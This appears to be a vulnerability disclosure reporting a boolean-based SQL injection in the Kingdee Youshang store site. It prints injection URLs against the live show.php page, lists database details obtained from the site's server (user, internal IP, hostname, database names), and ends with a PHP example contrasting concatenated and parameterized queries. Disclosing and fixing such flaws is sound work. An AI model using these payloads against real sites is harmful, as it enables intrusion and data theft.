### Brief description:

The Kingdee Youshang website has a SQL injection vulnerability.

### Details:

The Kingdee Youshang website has a SQL injection vulnerability through which the related database tables and records can be obtained.

### Proof of vulnerability:

Result with `1=1` appended:

http://store.youshang.com/show.php?id=81738%20and%201=1

![](https://images.seebug.org/upload/201204/01154743410682f03518f158b49d22659fdced5f.jpg)

Result with `1=2` appended:

http://store.youshang.com/show.php?id=81738%20and%201=2

![](https://images.seebug.org/upload/201204/011548315a2e3ae1eac07140b2edfd7b7461fe96.jpg)

Database information:

- Current User: youshangportal@192.168.30.114
- Sql Version: 5.0.77-log
- Current DB: youshangportal
- System User: youshangportal@192.168.30.114
- Host Name: REDHAT64BI
- Installation dir: /usr/local/mysql/
- DB User: 'youshangportal'@'%'
- Data Bases:
  - information_schema
  - test
  - youshangportal
  - ysproject

Related tables:

![](https://images.seebug.org/upload/201204/01155000bf9dff22e25757f57c4f6057d3bfebad.jpg)

![](https://images.seebug.org/upload/201204/01155614a319d00f4df7bb21ddec99f11eefe194.jpg)
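The differing responses to `and 1=1` and `and 1=2` show that the `id` parameter reaches the SQL text unmodified. The following is an added example, not the site's own code: it places that query pattern beside a validated, parameterized form. The `items` table, its columns and both function names are assumptions, and an in-memory SQLite database stands in for the MySQL server.

```php
<?php
// Constructed stand-in for the store database; table and column names are assumptions.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO items VALUES (81738, 'sample item')");

// Vulnerable pattern (hypothetical): the raw id parameter is concatenated into
// the SQL text, so anything after the number is parsed as part of the WHERE clause.
function show_vulnerable(PDO $db, string $id): ?array {
    $row = $db->query("SELECT id, title FROM items WHERE id = $id")
              ->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened pattern (hypothetical): accept only a plain decimal integer, then
// bind it as a typed parameter so it can never become SQL syntax.
function show_hardened(PDO $db, string $id): ?array {
    if (!ctype_digit($id)) {
        return null; // treat as "not found", or answer with HTTP 400
    }
    $stmt = $db->prepare('SELECT id, title FROM items WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// The two values from the proof above, plus the legitimate id (URL-decoded).
$inputs = ['81738', '81738 and 1=1', '81738 and 1=2'];
foreach ($inputs as $in) {
    printf("%-16s vulnerable=%-5s hardened=%s\n", $in,
        show_vulnerable($db, $in) ? 'row' : 'empty',
        show_hardened($db, $in) ? 'row' : 'empty');
}
```

With the concatenated query, the page content depends on whether the appended condition is true. The hardened lookup gives the same "not found" answer for both appended conditions and returns the row only for the plain numeric id.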